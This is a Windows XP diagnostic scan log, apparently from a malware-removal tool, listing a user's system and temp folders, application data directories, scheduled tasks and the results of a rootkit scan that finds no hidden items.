wpa.dbl -> %SystemRoot%\System32\wpa.dbl ->  [Ver =  | Size = 2206 bytes | Modified Date = 8/19/2008 2:19:20 PM | Attr =    ]
$hf_mig$ -> %SystemRoot%\$hf_mig$ ->  [Folder | Modified Date = 8/12/2008 10:04:06 PM | Attr =  H ]
1 C:\WINDOWS\*.tmp files -> C:\WINDOWS\*.tmp -> 
bootstat.dat -> %SystemRoot%\bootstat.dat ->  [Ver =  | Size = 2048 bytes | Modified Date = 8/24/2008 8:17:18 AM | Attr =   S]
ie7updates -> %SystemRoot%\ie7updates ->  [Folder | Modified Date = 8/12/2008 10:02:58 PM | Attr =    ]
imsins.BAK -> %SystemRoot%\imsins.BAK ->  [Ver =  | Size = 1374 bytes | Modified Date = 8/12/2008 10:04:08 PM | Attr =    ]
inf -> %SystemRoot%\inf ->  [Folder | Modified Date = 8/19/2008 7:12:38 PM | Attr =  H ]
Installer -> %SystemRoot%\Installer ->  [Folder | Modified Date = 8/22/2008 6:41:38 PM | Attr =  HS]
Prefetch -> %SystemRoot%\Prefetch ->  [Folder | Modified Date = 8/24/2008 9:33:46 AM | Attr =    ]
QTFont.for -> %SystemRoot%\QTFont.for ->  [Ver =  | Size = 1409 bytes | Modified Date = 8/22/2008 6:12:04 PM | Attr =    ]
QTFont.qfn -> %SystemRoot%\QTFont.qfn ->  [Ver =  | Size = 54156 bytes | Modified Date = 8/22/2008 6:12:04 PM | Attr =  H ]
SysRes.vbs -> %SystemRoot%\SysRes.vbs ->  [Ver =  | Size = 0 bytes | Modified Date = 8/24/2008 9:25:04 AM | Attr =    ]
system32 -> %SystemRoot%\system32 ->  [Folder | Modified Date = 8/23/2008 8:01:34 AM | Attr =    ]
Temp -> %SystemRoot%\Temp ->  [Folder | Modified Date = 8/24/2008 9:34:21 AM | Attr =    ]
win.ini -> %SystemRoot%\win.ini ->  [Ver =  | Size = 582 bytes | Modified Date = 8/24/2008 9:24:01 AM | Attr =    ]
WinSxS -> %SystemRoot%\WinSxS ->  [Folder | Modified Date = 8/1/2008 3:12:18 PM | Attr =    ]
SA.DAT -> %SystemRoot%\tasks\SA.DAT ->  [Ver =  | Size = 6 bytes | Modified Date = 8/24/2008 8:17:19 AM | Attr =  H ]
C:\Documents and Settings\All Users\Application Data\Microsoft\Network\Downloader\ -> C:\Documents and Settings\All Users\Application Data\Microsoft\Network\Downloader ->  [Folder | Modified Date = 5/5/2008 3:27:24 PM | Attr =    ]
qmgr0.dat -> C:\Documents and Settings\All Users\Application Data\Microsoft\Network\Downloader\qmgr0.dat ->  [Ver =  | Size = 7959 bytes | Modified Date = 8/24/2008 8:18:20 AM | Attr =    ]
qmgr1.dat -> C:\Documents and Settings\All Users\Application Data\Microsoft\Network\Downloader\qmgr1.dat ->  [Ver =  | Size = 7959 bytes | Modified Date = 8/24/2008 8:18:20 AM | Attr =    ]
C:\Documents and Settings\All Users\Application Data\Microsoft\Works\ -> C:\Documents and Settings\All Users\Application Data\Microsoft\Works ->  [Folder | Modified Date = 8/16/2008 6:21:57 AM | Attr =    ]
wkcalcat.dat -> C:\Documents and Settings\All Users\Application Data\Microsoft\Works\wkcalcat.dat ->  [Ver =  | Size = 16384 bytes | Modified Date = 5/6/2008 6:15:17 AM | Attr =    ]
C:\Documents and Settings\Tom\Local Settings\Temp\Temporary Internet Files\Content.IE5\UJC9P4F6\ -> C:\Documents and Settings\Tom\Local Settings\Temp\Temporary Internet Files\Content.IE5\UJC9P4F6 ->  [Folder | Modified Date = 8/19/2008 4:40:34 PM | Attr =  HS]
dref=http%253A%252F%252Fwww.shopping[1].com%252FxPO-Canon-EF-50mm-f-1-8-II-Lens -> C:\Documents and Settings\Tom\Local Settings\Temp\Temporary Internet Files\Content.IE5\UJC9P4F6\dref=http%253A%252F%252Fwww.sho ->  [Ver =  | Size = 1476 bytes | Modified Date = 8/15/2008 11:12:06 PM | Attr =    ]
C:\Documents and Settings\Tom\Local Settings\Temp\GGS1A2.tmp\ -> C:\Documents and Settings\Tom\Local Settings\Temp\GGS1A2.tmp\ ->  [Folder | Modified Date = 5/15/2008 9:34:51 PM | Attr =    ]
setuphook.dll -> C:\Documents and Settings\Tom\Local Settings\Temp\GGS1A2.tmp\setuphook.dll ->  [Ver =  | Size = 24576 bytes | Modified Date = 5/15/2008 9:34:42 PM | Attr =    ]
C:\Documents and Settings\Tom\Local Settings\Temp\PccMsi\ -> C:\Documents and Settings\Tom\Local Settings\Temp\PccMsi ->  [Folder | Modified Date = 8/21/2008 6:17:53 PM | Attr =    ]
tmdbg.dll -> C:\Documents and Settings\Tom\Local Settings\Temp\PccMsi\tmdbg.dll ->  [Ver =  | Size = 198232 bytes | Modified Date = 9/18/2006 2:50:12 PM | Attr =    ]
C:\Documents and Settings\Tom\Local Settings\Temp\rninst~0\ -> C:\Documents and Settings\Tom\Local Settings\Temp\rninst~0 ->  [Folder | Modified Date = 5/15/2008 9:35:46 PM | Attr =    ]
control.dll -> C:\Documents and Settings\Tom\Local Settings\Temp\rninst~0\control.dll -> RealNetworks, Inc. [Ver = 1.0.6.80 | Size = 42528 bytes | Modified Date = 5/15/2008 9:33:36 PM | Attr =    ]
C:\Documents and Settings\Tom\Local Settings\Temp\Cookies\ -> C:\Documents and Settings\Tom\Local Settings\Temp\Cookies ->  [Folder | Modified Date = 8/19/2008 5:43:01 PM | Attr =  HS]
index.dat -> C:\Documents and Settings\Tom\Local Settings\Temp\Cookies\index.dat ->  [Ver =  | Size = 114688 bytes | Modified Date = 8/20/2008 3:21:58 PM | Attr =  HS]
C:\Documents and Settings\Tom\Local Settings\Temp\GGS1A2.tmp\Fake Profile\ -> C:\Documents and Settings\Tom\Local Settings\Temp\GGS1A2.tmp\Fake Profile ->  [Folder | Modified Date = 8/21/2008 6:17:53 PM | Attr =    ]
compreg.dat -> C:\Documents and Settings\Tom\Local Settings\Temp\GGS1A2.tmp\Fake Profile\compreg.dat ->  [Ver =  | Size = 147247 bytes | Modified Date = 5/15/2008 9:34:50 PM | Attr =    ]
xpti.dat -> C:\Documents and Settings\Tom\Local Settings\Temp\GGS1A2.tmp\Fake Profile\xpti.dat ->  [Ver =  | Size = 92986 bytes | Modified Date = 5/15/2008 9:34:49 PM | Attr =    ]
C:\Documents and Settings\Tom\Local Settings\Temp\History\History.IE5\ -> C:\Documents and Settings\Tom\Local Settings\Temp\History\History.IE5\ ->  [Folder | Modified Date = 8/21/2008 6:18:54 PM | Attr =  HS]
index.dat -> C:\Documents and Settings\Tom\Local Settings\Temp\History\History.IE5\index.dat ->  [Ver =  | Size = 786432 bytes | Modified Date = 8/20/2008 3:21:58 PM | Attr =  HS]
C:\Documents and Settings\Tom\Local Settings\Temp\Temporary Internet Files\Content.IE5\ -> C:\Documents and Settings\Tom\Local Settings\Temp\Temporary Internet Files\Content.IE5\ ->  [Folder | Modified Date = 8/10/2008 2:55:23 PM | Attr =  HS]
index.dat -> C:\Documents and Settings\Tom\Local Settings\Temp\Temporary Internet Files\Content.IE5\index.dat ->  [Ver =  | Size = 2981888 bytes | Modified Date = 8/20/2008 3:21:58 PM | Attr =  HS]
C:\Documents and Settings\Tom\Local Settings\Temp\_is6D\ -> C:\Documents and Settings\Tom\Local Settings\Temp\_is6D ->  [Folder | Modified Date = 8/19/2008 6:00:44 PM | Attr =    ]
0x0404.ini -> C:\Documents and Settings\Tom\Local Settings\Temp\_is6D\0x0404.ini ->  [Ver =  | Size = 3771 bytes | Modified Date = 8/19/2008 6:00:44 PM | Attr =    ]
0x0407.ini -> C:\Documents and Settings\Tom\Local Settings\Temp\_is6D\0x0407.ini ->  [Ver =  | Size = 6265 bytes | Modified Date = 8/19/2008 6:00:44 PM | Attr =    ]
0x0409.ini -> C:\Documents and Settings\Tom\Local Settings\Temp\_is6D\0x0409.ini ->  [Ver =  | Size = 5495 bytes | Modified Date = 8/19/2008 6:00:44 PM | Attr =    ]
0x040a.ini -> C:\Documents and Settings\Tom\Local Settings\Temp\_is6D\0x040a.ini ->  [Ver =  | Size = 6265 bytes | Modified Date = 8/19/2008 6:00:44 PM | Attr =    ]
0x040c.ini -> C:\Documents and Settings\Tom\Local Settings\Temp\_is6D\0x040c.ini ->  [Ver =  | Size = 6394 bytes | Modified Date = 8/19/2008 6:00:44 PM | Attr =    ]
0x0410.ini -> C:\Documents and Settings\Tom\Local Settings\Temp\_is6D\0x0410.ini ->  [Ver =  | Size = 6160 bytes | Modified Date = 8/19/2008 6:00:44 PM | Attr =    ]
0x0411.ini -> C:\Documents and Settings\Tom\Local Settings\Temp\_is6D\0x0411.ini ->  [Ver =  | Size = 5887 bytes | Modified Date = 8/19/2008 6:00:44 PM | Attr =    ]
0x0412.ini -> C:\Documents and Settings\Tom\Local Settings\Temp\_is6D\0x0412.ini ->  [Ver =  | Size = 5045 bytes | Modified Date = 8/19/2008 6:00:44 PM | Attr =    ]
0x0413.ini -> C:\Documents and Settings\Tom\Local Settings\Temp\_is6D\0x0413.ini ->  [Ver =  | Size = 6087 bytes | Modified Date = 8/19/2008 6:00:44 PM | Attr =    ]
0x0416.ini -> C:\Documents and Settings\Tom\Local Settings\Temp\_is6D\0x0416.ini ->  [Ver =  | Size = 5900 bytes | Modified Date = 8/19/2008 6:00:44 PM | Attr =    ]
0x0804.ini -> C:\Documents and Settings\Tom\Local Settings\Temp\_is6D\0x0804.ini ->  [Ver =  | Size = 3841 bytes | Modified Date = 8/19/2008 6:00:44 PM | Attr =    ]
Setup.INI -> C:\Documents and Settings\Tom\Local Settings\Temp\_is6D\Setup.INI ->  [Ver =  | Size = 1994 bytes | Modified Date = 8/19/2008 6:00:44 PM | Attr =    ]
_ISMSIDEL.INI -> C:\Documents and Settings\Tom\Local Settings\Temp\_is6D\_ISMSIDEL.INI ->  [Ver =  | Size = 717 bytes | Modified Date = 8/19/2008 6:00:44 PM | Attr =    ]
C:\Documents and Settings\Tom\Local Settings\Temp\GGS1A2.tmp\Fake Profile\ -> C:\Documents and Settings\Tom\Local Settings\Temp\GGS1A2.tmp\Fake Profile ->  [Folder | Modified Date = 8/21/2008 6:17:53 PM | Attr =    ]
compatibility.ini -> C:\Documents and Settings\Tom\Local Settings\Temp\GGS1A2.tmp\Fake Profile\compatibility.ini ->  [Ver =  | Size = 138 bytes | Modified Date = 5/15/2008 9:34:49 PM | Attr =    ]
C:\Documents and Settings\Tom\Local Settings\Temp\History\ -> C:\Documents and Settings\Tom\Local Settings\Temp\History ->  [Folder | Modified Date = 8/3/2008 4:22:44 PM | Attr =  HS]
desktop.ini -> C:\Documents and Settings\Tom\Local Settings\Temp\History\desktop.ini ->  [Ver =  | Size = 145 bytes | Modified Date = 8/3/2008 4:23:14 PM | Attr =    ]
C:\Documents and Settings\Tom\Local Settings\Temp\History\History.IE5\ -> C:\Documents and Settings\Tom\Local Settings\Temp\History\History.IE5\ ->  [Folder | Modified Date = 8/21/2008 6:18:54 PM | Attr =  HS]
desktop.ini -> C:\Documents and Settings\Tom\Local Settings\Temp\History\History.IE5\desktop.ini ->  [Ver =  | Size = 145 bytes | Modified Date = 8/3/2008 4:22:44 PM | Attr =  HS]
C:\Documents and Settings\Tom\Local Settings\Temp\PccMsi\ -> C:\Documents and Settings\Tom\Local Settings\Temp\PccMsi ->  [Folder | Modified Date = 8/21/2008 6:17:53 PM | Attr =    ]
pccillin.ini -> C:\Documents and Settings\Tom\Local Settings\Temp\PccMsi\pccillin.ini ->  [Ver =  | Size = 1524 bytes | Modified Date = 8/21/2006 10:25:10 AM | Attr =    ]
C:\Documents and Settings\Tom\Local Settings\Temp\Temporary Internet Files\Content.IE5\ -> C:\Documents and Settings\Tom\Local Settings\Temp\Temporary Internet Files\Content.IE5\ ->  [Folder | Modified Date = 8/10/2008 2:55:23 PM | Attr =  HS]
desktop.ini -> C:\Documents and Settings\Tom\Local Settings\Temp\Temporary Internet Files\Content.IE5\desktop.ini ->  [Ver =  | Size = 67 bytes | Modified Date = 8/3/2008 4:22:44 PM | Attr =  HS]
C:\Documents and Settings\Tom\Local Settings\Temp\Temporary Internet Files\Content.IE5\507FE4WC\ -> C:\Documents and Settings\Tom\Local Settings\Temp\Temporary Internet Files\Content.IE5\507FE4WC ->  [Folder | Modified Date = 8/17/2008 5:40:30 PM | Attr =  HS]
desktop.ini -> C:\Documents and Settings\Tom\Local Settings\Temp\Temporary Internet Files\Content.IE5\507FE4WC\desktop.ini ->  [Ver =  | Size = 67 bytes | Modified Date = 8/3/2008 4:22:44 PM | Attr =  HS]
C:\Documents and Settings\Tom\Local Settings\Temp\Temporary Internet Files\Content.IE5\8C81FFFT\ -> C:\Documents and Settings\Tom\Local Settings\Temp\Temporary Internet Files\Content.IE5\8C81FFFT ->  [Folder | Modified Date = 8/19/2008 4:29:24 PM | Attr =  HS]
desktop.ini -> C:\Documents and Settings\Tom\Local Settings\Temp\Temporary Internet Files\Content.IE5\8C81FFFT\desktop.ini ->  [Ver =  | Size = 67 bytes | Modified Date = 8/10/2008 2:55:23 PM | Attr =  HS]
C:\Documents and Settings\Tom\Local Settings\Temp\Temporary Internet Files\Content.IE5\B0J23P0L\ -> C:\Documents and Settings\Tom\Local Settings\Temp\Temporary Internet Files\Content.IE5\B0J23P0L ->  [Folder | Modified Date = 8/19/2008 4:42:01 PM | Attr =  HS]
desktop.ini -> C:\Documents and Settings\Tom\Local Settings\Temp\Temporary Internet Files\Content.IE5\B0J23P0L\desktop.ini ->  [Ver =  | Size = 67 bytes | Modified Date = 8/10/2008 2:55:23 PM | Attr =  HS]
C:\Documents and Settings\Tom\Local Settings\Temp\Temporary Internet Files\Content.IE5\B1QZLRI4\ -> C:\Documents and Settings\Tom\Local Settings\Temp\Temporary Internet Files\Content.IE5\B1QZLRI4 ->  [Folder | Modified Date = 8/19/2008 4:32:54 PM | Attr =  HS]
desktop.ini -> C:\Documents and Settings\Tom\Local Settings\Temp\Temporary Internet Files\Content.IE5\B1QZLRI4\desktop.ini ->  [Ver =  | Size = 67 bytes | Modified Date = 8/10/2008 2:55:23 PM | Attr =  HS]
C:\Documents and Settings\Tom\Local Settings\Temp\Temporary Internet Files\Content.IE5\EVLCARZ7\ -> C:\Documents and Settings\Tom\Local Settings\Temp\Temporary Internet Files\Content.IE5\EVLCARZ7 ->  [Folder | Modified Date = 8/19/2008 4:18:09 PM | Attr =  HS]
desktop.ini -> C:\Documents and Settings\Tom\Local Settings\Temp\Temporary Internet Files\Content.IE5\EVLCARZ7\desktop.ini ->  [Ver =  | Size = 67 bytes | Modified Date = 8/3/2008 4:22:44 PM | Attr =  HS]
C:\Documents and Settings\Tom\Local Settings\Temp\Temporary Internet Files\Content.IE5\FE6P18V8\ -> C:\Documents and Settings\Tom\Local Settings\Temp\Temporary Internet Files\Content.IE5\FE6P18V8 ->  [Folder | Modified Date = 8/19/2008 4:33:20 PM | Attr =  HS]
desktop.ini -> C:\Documents and Settings\Tom\Local Settings\Temp\Temporary Internet Files\Content.IE5\FE6P18V8\desktop.ini ->  [Ver =  | Size = 67 bytes | Modified Date = 8/10/2008 2:55:23 PM | Attr =  HS]
C:\Documents and Settings\Tom\Local Settings\Temp\Temporary Internet Files\Content.IE5\OSYDQKN8\ -> C:\Documents and Settings\Tom\Local Settings\Temp\Temporary Internet Files\Content.IE5\OSYDQKN8 ->  [Folder | Modified Date = 8/19/2008 4:10:05 PM | Attr =  HS]
desktop.ini -> C:\Documents and Settings\Tom\Local Settings\Temp\Temporary Internet Files\Content.IE5\OSYDQKN8\desktop.ini ->  [Ver =  | Size = 67 bytes | Modified Date = 8/3/2008 4:22:44 PM | Attr =  HS]
C:\Documents and Settings\Tom\Local Settings\Temp\Temporary Internet Files\Content.IE5\UJC9P4F6\ -> C:\Documents and Settings\Tom\Local Settings\Temp\Temporary Internet Files\Content.IE5\UJC9P4F6 ->  [Folder | Modified Date = 8/19/2008 4:40:34 PM | Attr =  HS]
desktop.ini -> C:\Documents and Settings\Tom\Local Settings\Temp\Temporary Internet Files\Content.IE5\UJC9P4F6\desktop.ini ->  [Ver =  | Size = 67 bytes | Modified Date = 8/3/2008 4:22:44 PM | Attr =  HS]
C:\WINDOWS\Temp\Cookies\ -> C:\WINDOWS\Temp\Cookies ->  [Folder | Modified Date = 5/5/2008 3:15:43 PM | Attr =   S]
index.dat -> C:\WINDOWS\Temp\Cookies\index.dat ->  [Ver =  | Size = 16384 bytes | Modified Date = 5/5/2008 3:15:43 PM | Attr =    ]
C:\WINDOWS\Temp\History\History.IE5\ -> C:\WINDOWS\Temp\History\History.IE5\ ->  [Folder | Modified Date = 5/5/2008 3:15:43 PM | Attr =   S]
index.dat -> C:\WINDOWS\Temp\History\History.IE5\index.dat ->  [Ver =  | Size = 16384 bytes | Modified Date = 5/5/2008 3:15:43 PM | Attr =    ]
C:\WINDOWS\Temp\Temporary Internet Files\Content.IE5\ -> C:\WINDOWS\Temp\Temporary Internet Files\Content.IE5\ ->  [Folder | Modified Date = 5/5/2008 3:15:43 PM | Attr =   S]
index.dat -> C:\WINDOWS\Temp\Temporary Internet Files\Content.IE5\index.dat ->  [Ver =  | Size = 16384 bytes | Modified Date = 5/5/2008 3:15:43 PM | Attr =    ]
C:\WINDOWS\Temp\History\History.IE5\ -> C:\WINDOWS\Temp\History\History.IE5\ ->  [Folder | Modified Date = 5/5/2008 3:15:43 PM | Attr =   S]
desktop.ini -> C:\WINDOWS\Temp\History\History.IE5\desktop.ini ->  [Ver =  | Size = 113 bytes | Modified Date = 5/5/2008 3:15:43 PM | Attr =  HS]
C:\WINDOWS\Temp\Temporary Internet Files\Content.IE5\ -> C:\WINDOWS\Temp\Temporary Internet Files\Content.IE5\ ->  [Folder | Modified Date = 5/5/2008 3:15:43 PM | Attr =   S]
desktop.ini -> C:\WINDOWS\Temp\Temporary Internet Files\Content.IE5\desktop.ini ->  [Ver =  | Size = 67 bytes | Modified Date = 5/5/2008 3:15:43 PM | Attr =  HS]
C:\WINDOWS\Temp\Temporary Internet Files\Content.IE5\4TI7WDYN\ -> C:\WINDOWS\Temp\Temporary Internet Files\Content.IE5\4TI7WDYN ->  [Folder | Modified Date = 5/5/2008 3:15:43 PM | Attr =   S]
desktop.ini -> C:\WINDOWS\Temp\Temporary Internet Files\Content.IE5\4TI7WDYN\desktop.ini ->  [Ver =  | Size = 67 bytes | Modified Date = 5/5/2008 3:15:43 PM | Attr =  HS]
C:\WINDOWS\Temp\Temporary Internet Files\Content.IE5\A1H3279G\ -> C:\WINDOWS\Temp\Temporary Internet Files\Content.IE5\A1H3279G ->  [Folder | Modified Date = 5/5/2008 3:15:43 PM | Attr =   S]
desktop.ini -> C:\WINDOWS\Temp\Temporary Internet Files\Content.IE5\A1H3279G\desktop.ini ->  [Ver =  | Size = 67 bytes | Modified Date = 5/5/2008 3:15:43 PM | Attr =  HS]
C:\WINDOWS\Temp\Temporary Internet Files\Content.IE5\GDI389U7\ -> C:\WINDOWS\Temp\Temporary Internet Files\Content.IE5\GDI389U7 ->  [Folder | Modified Date = 5/5/2008 3:15:43 PM | Attr =   S]
desktop.ini -> C:\WINDOWS\Temp\Temporary Internet Files\Content.IE5\GDI389U7\desktop.ini ->  [Ver =  | Size = 67 bytes | Modified Date = 5/5/2008 3:15:43 PM | Attr =  HS]
C:\WINDOWS\Temp\Temporary Internet Files\Content.IE5\H4CVEOUQ\ -> C:\WINDOWS\Temp\Temporary Internet Files\Content.IE5\H4CVEOUQ ->  [Folder | Modified Date = 5/5/2008 3:15:43 PM | Attr =   S]
desktop.ini -> C:\WINDOWS\Temp\Temporary Internet Files\Content.IE5\H4CVEOUQ\desktop.ini ->  [Ver =  | Size = 67 bytes | Modified Date = 5/5/2008 3:15:43 PM | Attr =  HS]

[File - Lop Check: Additional Folder Scans - Non-Microsoft Only]
Application Data -> C:\Documents and Settings\All Users\Application Data ->  [Folder | Modified Date = 8/20/2008 8:28:13 AM | Attr = RH ]
Adobe -> C:\Documents and Settings\All Users\Application Data\Adobe ->  [Folder | Modified Date = 5/5/2008 10:18:00 PM | Attr =    ]
AOL -> C:\Documents and Settings\All Users\Application Data\AOL ->  [Folder | Modified Date = 5/19/2008 7:38:16 PM | Attr =    ]
AOL Downloads -> C:\Documents and Settings\All Users\Application Data\AOL Downloads ->  [Folder | Modified Date = 5/16/2008 7:21:19 AM | Attr =    ]
AOL OCP -> C:\Documents and Settings\All Users\Application Data\AOL OCP ->  [Folder | Modified Date = 5/19/2008 7:38:34 PM | Attr =    ]
Apple -> C:\Documents and Settings\All Users\Application Data\Apple ->  [Folder | Modified Date = 5/22/2008 6:56:32 AM | Attr =    ]
Apple Computer -> C:\Documents and Settings\All Users\Application Data\Apple Computer ->  [Folder | Modified Date = 5/22/2008 6:56:43 AM | Attr =    ]
Citrix -> C:\Documents and Settings\All Users\Application Data\Citrix ->  [Folder | Modified Date = 5/16/2008 6:02:50 AM | Attr =    ]
CyberLink -> C:\Documents and Settings\All Users\Application Data\CyberLink ->  [Folder | Modified Date = 5/5/2008 11:02:23 PM | Attr =    ]
Dell -> C:\Documents and Settings\All Users\Application Data\Dell ->  [Folder | Modified Date = 5/5/2008 7:12:52 PM | Attr =    ]
DellFaxCtr -> C:\Documents and Settings\All Users\Application Data\DellFaxCtr ->  [Folder | Modified Date = 5/5/2008 8:13:32 PM | Attr =    ]
Google -> C:\Documents and Settings\All Users\Application Data\Google ->  [Folder | Modified Date = 5/8/2008 7:50:36 PM | Attr =    ]
Google Updater -> C:\Documents and Settings\All Users\Application Data\Google Updater ->  [Folder | Modified Date = 8/23/2008 8:26:17 PM | Attr =    ]
InstallShield -> C:\Documents and Settings\All Users\Application Data\InstallShield ->  [Folder | Modified Date = 4/30/2008 8:23:34 AM | Attr =    ]
Macromedia -> C:\Documents and Settings\All Users\Application Data\Macromedia ->  [Folder | Modified Date = 5/15/2008 6:51:59 PM | Attr =    ]
Microsoft -> C:\Documents and Settings\All Users\Application Data\Microsoft ->  [Folder | Modified Date = 5/5/2008 11:02:05 PM | Attr =   S]
SBSI -> C:\Documents and Settings\All Users\Application Data\SBSI ->  [Folder | Modified Date = 8/10/2004 11:13:06 AM | Attr =    ]
Sonic -> C:\Documents and Settings\All Users\Application Data\Sonic ->  [Folder | Modified Date = 4/30/2008 8:23:51 AM | Attr =    ]
SupportSoft -> C:\Documents and Settings\All Users\Application Data\SupportSoft ->  [Folder | Modified Date = 4/30/2008 8:22:19 AM | Attr =    ]
Trend Micro -> C:\Documents and Settings\All Users\Application Data\Trend Micro ->  [Folder | Modified Date = 8/19/2008 6:03:08 PM | Attr =    ]
Uninstall -> C:\Documents and Settings\All Users\Application Data\Uninstall ->  [Folder | Modified Date = 4/30/2008 8:24:10 AM | Attr =    ]
Viewpoint -> C:\Documents and Settings\All Users\Application Data\Viewpoint ->  [Folder | Modified Date = 5/15/2008 6:51:27 PM | Attr =    ]
Windows Genuine Advantage -> C:\Documents and Settings\All Users\Application Data\Windows Genuine Advantage ->  [Folder | Modified Date = 6/6/2008 8:45:51 PM | Attr =    ]
WinZipSE -> C:\Documents and Settings\All Users\Application Data\WinZipSE ->  [Folder | Modified Date = 8/20/2008 8:28:13 AM | Attr =    ]
Application Data -> C:\Documents and Settings\Tom\Application Data ->  [Folder | Modified Date = 8/22/2008 6:47:20 PM | Attr = RH ]
Adobe -> C:\Documents and Settings\Tom\Application Data\Adobe ->  [Folder | Modified Date = 8/15/2008 8:09:06 PM | Attr =    ]
AOL -> C:\Documents and Settings\Tom\Application Data\AOL ->  [Folder | Modified Date = 5/19/2008 7:39:54 PM | Attr =    ]
Corel Photo Album -> C:\Documents and Settings\Tom\Application Data\Corel Photo Album ->  [Folder | Modified Date = 5/5/2008 9:55:21 PM | Attr =    ]
CyberLink -> C:\Documents and Settings\Tom\Application Data\CyberLink ->  [Folder | Modified Date = 4/30/2008 8:23:56 AM | Attr =    ]
DellFaxCtr -> C:\Documents and Settings\Tom\Application Data\DellFaxCtr ->  [Folder | Modified Date = 5/6/2008 6:03:30 AM | Attr =    ]
Flickr -> C:\Documents and Settings\Tom\Application Data\Flickr ->  [Folder | Modified Date = 8/1/2008 3:12:30 PM | Attr =    ]
Google -> C:\Documents and Settings\Tom\Application Data\Google ->  [Folder | Modified Date = 5/5/2008 7:15:41 PM | Attr =    ]
Identities -> C:\Documents and Settings\Tom\Application Data\Identities ->  [Folder | Modified Date = 8/10/2004 11:08:32 AM | Attr =    ]
InstallShield -> C:\Documents and Settings\Tom\Application Data\InstallShield ->  [Folder | Modified Date = 4/30/2008 8:15:16 AM | Attr =    ]
Macromedia -> C:\Documents and Settings\Tom\Application Data\Macromedia ->  [Folder | Modified Date = 5/5/2008 7:17:07 PM | Attr =    ]
Microsoft -> C:\Documents and Settings\Tom\Application Data\Microsoft ->  [Folder | Modified Date = 5/24/2008 8:53:30 AM | Attr =   S]
Mozilla -> C:\Documents and Settings\Tom\Application Data\Mozilla ->  [Folder | Modified Date = 5/16/2008 7:21:21 AM | Attr =    ]
Real -> C:\Documents and Settings\Tom\Application Data\Real ->  [Folder | Modified Date = 5/15/2008 9:35:44 PM | Attr =    ]
Roxio -> C:\Documents and Settings\Tom\Application Data\Roxio ->  [Folder | Modified Date = 5/5/2008 11:02:01 PM | Attr =    ]
Sun -> C:\Documents and Settings\Tom\Application Data\Sun ->  [Folder | Modified Date = 5/16/2008 6:02:16 AM | Attr =    ]
Talkback -> C:\Documents and Settings\Tom\Application Data\Talkback ->  [Folder | Modified Date = 5/15/2008 9:36:02 PM | Attr =    ]
Template -> C:\Documents and Settings\Tom\Application Data\Template ->  [Folder | Modified Date = 5/6/2008 6:20:40 AM | Attr =    ]
U3 -> C:\Documents and Settings\Tom\Application Data\U3 ->  [Folder | Modified Date = 8/24/2008 9:32:55 AM | Attr =    ]
C:\WINDOWS\Tasks\ -> C:\WINDOWS\Tasks ->  [Folder | Modified Date = 5/22/2008 6:56:34 AM | Attr =   S]
AppleSoftwareUpdate.job -> C:\WINDOWS\Tasks\AppleSoftwareUpdate.job ->  [Ver =  | Size = 284 bytes | Modified Date = 5/26/2008 3:18:00 PM | Attr =    ]
desktop.ini -> C:\WINDOWS\Tasks\desktop.ini ->  [Ver =  | Size = 65 bytes | Modified Date = 8/4/2004 3:00:00 AM | Attr = RH ]
SA.DAT -> C:\WINDOWS\Tasks\SA.DAT ->  [Ver =  | Size = 6 bytes | Modified Date = 8/24/2008 8:17:19 AM | Attr =  H ]
[File - Purity Scan: Additional Folder Scans - Non-Microsoft Only]

[CatchMe Rootkit Scan by GMER]
< Windows folder & sub-folders >
scanning hidden processes ...
scanning hidden services & system hive ...
scanning hidden registry entries ...
scanning hidden files ...
scan completed successfully
hidden processes: 0
hidden services: 0
hidden files: 0
< Document and Settings folder & sub folders >
scanning hidden files ...
C:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Thumbs.db:encryptable 0 bytes
C:\Documents and Settings\Tom\Favorites\Diving\Save Money Diving Scuba diving, diving holidays, liveaboards, dive packages worldwide.url:favicon 1406 bytes
C:\Documents and Settings\Tom\Favorites\Finance\Bank of the West.url:favicon 1406 bytes
C:\Documents and Settings\Tom\Favorites\MalWare Removal • View forum - Malware Removal.url:favicon 1150 bytes
C:\Documents and Settings\Tom\Favorites\Panoramio - Photo of View from my Grandparents old house in Carnelian bay tahoe.url:favicon 3638 bytes
C:\Documents and Settings\Tom\Favorites\Travels\FlyerTalk - The world's most popular frequent flyer community.url:favicon 894 bytes
C:\Documents and Settings\Tom\Favorites\Travels\India Travel Forum  IndiaMike.com.url:favicon 1406 bytes
C:\Documents and Settings\Tom\Favorites\Travels\INDIAN RAILWAYS PASSENGER RESERVATION ENQUIRY.url:favicon 766 bytes
C:\Documents and Settings\Tom\Favorites\Travels\SeatGuru Seat Map Cathay Pacific Boeing 777-300 (773).url:favicon 4710 bytes
C:\Documents and Settings\Tom\Favorites\Travels\Travel Guard Product Information.url:favicon 318 bytes
C:\Documents and Settings\Tom\Favorites\Travels\Welcome to airasia.com...Now Everyone Can Fly....url:favicon 894 bytes
C:\Documents and Settings\Tom\Favorites\Weather\http--weather.noaa.gov-weather-current-KAAT.html.url:favicon 1406 bytes
C:\Documents and Settings\Tom\Favorites\Weather\National Weather Service - NWS San Francisco-Monterey Bay Area.url:favicon 1406 bytes
C:\Documents and Settings\Tom\Favorites\Weather\NexSat, NRL-NPOESS Next-Generation Weather Satellite Demonstration Project.url:favicon 1406 bytes
C:\Documents and Settings\Tom\Favorites\Weather\Typhoon2000.com®  The Philippines' First Website on Tropical Cyclones (Since 1997).url:favicon 1758 bytes
C:\Documents and Settings\Tom\Favorites\Weather\Welcome to Weather Underground  Weather Underground.url:favicon 1406 bytes
C:\Documents and Settings\Tom\Favorites\Welcome to Flickr - Photo Sharing.url:favicon 1150 bytes
C:\Documents and Settings\Tom\Favorites\Yahoo! Babel Fish - Text Translation and Web Page Translation.url:favicon 6598 bytes
C:\Documents and Settings\Tom\My Documents\01mywork-shop\Thumbs.db:encryptable 0 bytes
C:\Documents and Settings\Tom\My Documents\DSCN0826\Thumbs.db:encryptable 0 bytes
C:\Documents and Settings\Tom\My Documents\IMG_0370\Thumbs.db:encryptable 0 bytes
C:\Documents and Settings\Tom\My Documents\MikeWolfeMess007\Thumbs.db:encryptable 0 bytes
C:\Documents and Settings\Tom\My Documents\MikeWolfeMess015\Thumbs.db:encryptable 0 bytes
C:\Documents and Settings\Tom\My Documents\My Pictures\2008-05-26\Thumbs.db:encryptable 0 bytes
C:\Documents and Settings\Tom\My Documents\My Pictures\2008-06-05\Thumbs.db:encryptable 0 bytes
C:\Documents and Settings\Tom\My Documents\Thumbs.db:encryptable 0 bytes
C:\Documents and Settings\Tom\My Documents\TomJr\08Trip\Thumbs.db:encryptable 0 bytes
